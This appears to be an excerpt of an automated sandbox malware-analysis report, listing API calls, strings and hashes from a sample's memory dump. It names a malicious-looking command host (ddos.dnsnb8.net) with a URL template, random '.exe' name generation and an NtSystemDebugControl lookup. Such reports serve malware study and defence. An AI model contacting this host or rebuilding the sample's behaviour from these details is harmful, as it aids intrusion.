                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                          • String ID: I%p
                                          • API String ID: 876959470-956092038
                                          • Opcode ID: 8078c33404785d45c064edda1878f18aa956689c5366c4c138bb241dbf9b8a12
                                          • Instruction ID: 759f6072cb9142cbe764d8711ee18485a0307376a234153d1e44e908e31db793
                                          • Opcode Fuzzy Hash: 8078c33404785d45c064edda1878f18aa956689c5366c4c138bb241dbf9b8a12
                                          • Instruction Fuzzy Hash: D5017172901168FBCB216BD6DC48DDF7F7EEF85720F108221F915A51A0D6355A18CAA0
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00701118), ref: 00701867
                                          • srand.MSVCRT ref: 00701878
                                          • rand.MSVCRT ref: 00701880
                                          • srand.MSVCRT ref: 00701890
                                          • rand.MSVCRT ref: 00701894
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Timerandsrand$FileSystem
                                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                          • API String ID: 4106363736-3273462101
                                          • Opcode ID: 3d04c720fb9a01ad926d19519217ac32bdf1e4f3fffe5d7a068494fb3e645aee
                                          • Instruction ID: c404958feded1805ef498a45b7c051c807602d8add6d7106363dc8490b148744
                                          • Opcode Fuzzy Hash: 3d04c720fb9a01ad926d19519217ac32bdf1e4f3fffe5d7a068494fb3e645aee
                                          • Instruction Fuzzy Hash: 51E0D877A0021CFFE700A7F9EC8689EBBACDE84161B104627F600D3250E974FD448AB8
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,007029DB,?,00000001), ref: 007026A7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,007029DB,?,00000001), ref: 007026B5
                                          • lstrlen.KERNEL32(?), ref: 007026C4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 007026CE
                                          • lstrcpy.KERNEL32(00000004,?), ref: 007026E3
                                          • lstrcpy.KERNEL32(?,00000004), ref: 0070271F
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0070272D
                                          • SetEvent.KERNEL32 ref: 0070273C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                          • String ID:
                                          • API String ID: 41106472-0
                                          • Opcode ID: 06b9f75ae85fab01c0a170bacf655562c5058b5ab0d3b8adce2b2d4993541da5
                                          • Instruction ID: ade7315795ca25285b1e6d7d8d91136b9d2830ff7353c5f887f9bc98664637d7
                                          • Opcode Fuzzy Hash: 06b9f75ae85fab01c0a170bacf655562c5058b5ab0d3b8adce2b2d4993541da5
                                          • Instruction Fuzzy Hash: 1A118EB7501100EFCB219F24EC4C85A7BEEFB84720710C315FA54872A1DBBC8986DB68
                                          APIs
                                          Strings
                                          • .exe, xrefs: 00701C57
                                          • cnKCTRfwlhhevYIYOZFRKoMoPBbETAyNStrGbzcWQIXVEtdnJFTZWfGuLHWuAKmUmFVetLDmsEPOjUQaBZhYGIRnvPsQizOfyyXCuXpSiNkDaxwdqosjlrwviBJNLHzqpecxAVxlCrdjMbkpJMgDHaSqkgUg, xrefs: 00701B8A, 00701B9C, 00701C15, 00701C49
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: lstrcatmemcpymemsetrandsrand
                                          • String ID: .exe$cnKCTRfwlhhevYIYOZFRKoMoPBbETAyNStrGbzcWQIXVEtdnJFTZWfGuLHWuAKmUmFVetLDmsEPOjUQaBZhYGIRnvPsQizOfyyXCuXpSiNkDaxwdqosjlrwviBJNLHzqpecxAVxlCrdjMbkpJMgDHaSqkgUg
                                          • API String ID: 122620767-2182911200
                                          • Opcode ID: c8ea0ef2b7f894c0494fe54c0775f9e61aa543e66d831ca375fccbc8fb0bf8e4
                                          • Instruction ID: ce71b66191dbb83d197cdca231e0d0d1657c0b4ebc8ae0ffbd97e01207acbe75
                                          • Opcode Fuzzy Hash: c8ea0ef2b7f894c0494fe54c0775f9e61aa543e66d831ca375fccbc8fb0bf8e4
                                          • Instruction Fuzzy Hash: C92181A3F44190EEE3162335AC84B6A3FC59FE3711F558399F7850B2D3D66C05918268
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00701334
                                          • GetProcAddress.KERNEL32(00000000), ref: 0070133B
                                          • memset.MSVCRT ref: 00701359
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProcmemset
                                          • String ID: NtSystemDebugControl$ntdll.dll
                                          • API String ID: 3137504439-2438149413
                                          • Opcode ID: 8fae5c6585cd390aad0099da095f91817e82826f0a33c31c081896579cb3afc9
                                          • Instruction ID: 127b2efeec6215a772db6adab5d851ab3b4795ff8c0fd2e343364e54db9d55ea
                                          • Opcode Fuzzy Hash: 8fae5c6585cd390aad0099da095f91817e82826f0a33c31c081896579cb3afc9
                                          • Instruction Fuzzy Hash: 70016DB1A0130DFFDB10DF94AC8596FBBACFB45314F00833AF941A2180E6789A05CA55
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3636361484-0
                                          • Opcode ID: a6e0958f350a62b0e98585a6a58c4ca6115358c096b73c2cb98840328d9ca304
                                          • Instruction ID: af1d74f82995d088583af6df948247ad6b3f6e283105687629eaf333ca5e81b7
                                          • Opcode Fuzzy Hash: a6e0958f350a62b0e98585a6a58c4ca6115358c096b73c2cb98840328d9ca304
                                          • Instruction Fuzzy Hash: 7301F9B2904219EFEB205770EC48BDA77DDDB04351F844166EB45E30D0EEBCDA848BA4
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0070603C
                                          • GetProcAddress.KERNEL32(00000000,00706064), ref: 0070604F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                           • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: kernel32.dll
                                          • API String ID: 1646373207-1793498882
                                          • Opcode ID: e233b77e120cb45fea95984b5f8f0213f0d8b06c75b1eee0a8bac280b4b94044
                                          • Instruction ID: 4e373522b2b499c335e3bfa30d42a330779fcd99414174a3a0982d3621516ccf
                                          • Opcode Fuzzy Hash: e233b77e120cb45fea95984b5f8f0213f0d8b06c75b1eee0a8bac280b4b94044
                                          • Instruction Fuzzy Hash: 2CF0F0F1140289CFEF708EA4CC44BDE3BE4EF05700F90462AEA09CB281CB7886158B24